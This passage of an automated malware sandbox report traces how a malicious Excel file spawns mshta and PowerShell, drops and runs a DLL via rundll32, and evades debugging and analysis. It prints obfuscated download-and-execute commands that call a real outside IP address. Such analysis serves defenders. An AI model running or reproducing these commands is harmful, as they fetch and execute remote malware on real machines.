Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Jcwhaivtpnbramh\xjgaylzytzzvl.srm",DllRegisterServer
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Cdragpegkvqde\ljsxpi.ptx",mYtMYmZ
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Cdragpegkvqde\ljsxpi.ptx",DllRegisterServer
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\cmd.exe CMD.EXE /c ms^hta http://91.2^40.118.1^68/vvv/ppp/f^e.ht^m^l Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\mshta.exe mshta http://91.240.118.168/vvv/ppp/fe.html Jump to behavior
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.168/vvv/ppp/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\ProgramData\QWER.dll BBDD Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWow64\rundll32.exe C:\ProgramData\QWER.dll BBDD Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\ProgramData\QWER.dll",DllRegisterServer Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Bwqooqqzlaw\cojfo.cqz",OOkfVaPZ Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Bwqooqqzlaw\cojfo.cqz",DllRegisterServer Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Jcwhaivtpnbramh\xjgaylzytzzvl.srm",xvIpPUnGjiWnFD Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Jcwhaivtpnbramh\xjgaylzytzzvl.srm",DllRegisterServer Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Cdragpegkvqde\ljsxpi.ptx",mYtMYmZ Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Cdragpegkvqde\ljsxpi.ptx",DllRegisterServer Jump to behavior
Source: C:\Windows\System32\mshta.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32 Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\CVRE7DE.tmp Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWow64\rundll32.exe C:\ProgramData\QWER.dll BBDD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
Source: C:\Windows\System32\mshta.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\mshta.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dll Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: 4B14.tmp.0.dr Initial sample: OLE indicators vbamacros = False

Data Obfuscation
barindex
Obfuscated command line found
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\cmd.exe CMD.EXE /c ms^hta http://91.2^40.118.1^68/vvv/ppp/f^e.ht^m^l
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\cmd.exe CMD.EXE /c ms^hta http://91.2^40.118.1^68/vvv/ppp/f^e.ht^m^l Jump to behavior
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\System32\mshta.exe Code function: 4_3_039408D2 push 8B490321h; iretd 4_3_039408D7
Source: C:\Windows\System32\mshta.exe Code function: 4_3_039400BB push 8B490321h; iretd 4_3_039400C1
Source: C:\Windows\System32\mshta.exe Code function: 4_3_039408D2 push 8B490321h; iretd 4_3_039408D7
Source: C:\Windows\System32\mshta.exe Code function: 4_3_039400BB push 8B490321h; iretd 4_3_039400C1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10032B7D push ecx; ret 9_2_10032B90
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10030DFF push ecx; ret 9_2_10030E12
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_10032B7D push ecx; ret 11_2_10032B90
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_10030DFF push ecx; ret 11_2_10030E12
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_003C0C04 push ss; ret 15_2_003C0E40
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_003C0F14 push FFFFFFF8h; retf 15_2_003C0F23
Contains functionality to dynamically determine API calls
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_1003D873 LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__invoke_watson,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__invoke_watson,__decode_pointer,__decode_pointer,__decode_pointer, 9_2_1003D873
PE file contains an invalid checksum
Source: QWER.dll.6.dr Static PE information: real checksum: 0x8df98 should be: 0x9432d

Persistence and Installation Behavior
barindex
Drops PE files to the application program directory (C:\ProgramData)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\ProgramData\QWER.dll Jump to dropped file
Drops PE files
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Windows\SysWOW64\Bwqooqqzlaw\cojfo.cqz (copy) Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\ProgramData\QWER.dll Jump to dropped file
Drops PE files to the windows directory (C:\Windows)
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Windows\SysWOW64\Bwqooqqzlaw\cojfo.cqz (copy) Jump to dropped file

Hooking and other Techniques for Hiding and Protection
barindex
Hides that the sample has been downloaded from the Internet (zone.identifier)
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Bwqooqqzlaw\cojfo.cqz:Zone.Identifier read attributes | delete Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Jcwhaivtpnbramh\xjgaylzytzzvl.srm:Zone.Identifier read attributes | delete Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Cdragpegkvqde\ljsxpi.ptx:Zone.Identifier read attributes | delete Jump to behavior
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_100134F0 IsIconic, 9_2_100134F0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10018C9A IsIconic,GetWindowPlacement,GetWindowRect, 9_2_10018C9A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_100134F0 IsIconic, 11_2_100134F0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_10018C9A IsIconic,GetWindowPlacement,GetWindowRect, 11_2_10018C9A
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\mshta.exe TID: 1832 Thread sleep time: -360000s >= -30000s Jump to behavior
Found large amount of non-executed APIs
Source: C:\Windows\SysWOW64\rundll32.exe API coverage: 3.2 %
Source: C:\Windows\SysWOW64\rundll32.exe API coverage: 3.2 %
Source: C:\Windows\SysWOW64\rundll32.exe API call chain: ExitProcess graph end node
Source: C:\Windows\SysWOW64\rundll32.exe API call chain: ExitProcess graph end node
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini Jump to behavior
Source: rundll32.exe, 0000000C.00000002.564500652.000000000057A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10030334 VirtualQuery,GetSystemInfo,__invoke_watson,GetModuleHandleA,GetProcAddress,VirtualAlloc,VirtualProtect, 9_2_10030334
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10021854 __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA, 9_2_10021854
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_10021854 __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA, 11_2_10021854
Source: C:\Windows\SysWOW64\rundll32.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File Volume queried: C:\ FullSizeInformation Jump to behavior

Anti Debugging
barindex
Contains functionality to dynamically determine API calls
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_1003D873 LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__invoke_watson,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__invoke_watson,__decode_pointer,__decode_pointer,__decode_pointer, 9_2_1003D873
Contains functionality to read the PEB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00354087 mov eax, dword ptr fs:[00000030h] 9_2_00354087
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001F4087 mov eax, dword ptr fs:[00000030h] 10_2_001F4087
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00214087 mov eax, dword ptr fs:[00000030h] 11_2_00214087
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002E4087 mov eax, dword ptr fs:[00000030h] 12_2_002E4087
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00B14087 mov eax, dword ptr fs:[00000030h] 14_2_00B14087
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_003B3487 mov eax, dword ptr fs:[00000030h] 15_2_003B3487
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_00214087 mov eax, dword ptr fs:[00000030h] 15_2_00214087
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10037657 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 9_2_10037657
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10002280 SetLastError,SetLastError,SetLastError,SetLastError,GetNativeSystemInfo,SetLastError,VirtualAlloc,VirtualAlloc,SetLastError,GetProcessHeap,HeapAlloc,VirtualFree,SetLastError,VirtualAlloc,SetLastError, 9_2_10002280
Enables debug privileges
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10037657 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 9_2_10037657
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_1002F81E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 9_2_1002F81E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_1003B89A SetUnhandledExceptionFilter,__encode_pointer, 9_2_1003B89A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_1003B8BC __decode_pointer,SetUnhandledExceptionFilter, 9_2_1003B8BC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_1003ACCC __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 9_2_1003ACCC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_10037657 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 11_2_10037657
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_1002F81E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 11_2_1002F81E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_1003B89A SetUnhandledExceptionFilter,__encode_pointer, 11_2_1003B89A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_1003B8BC __decode_pointer,SetUnhandledExceptionFilter, 11_2_1003B8BC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_1003ACCC __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 11_2_1003ACCC

HIPS / PFW / Operating System Protection Evasion
barindex
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
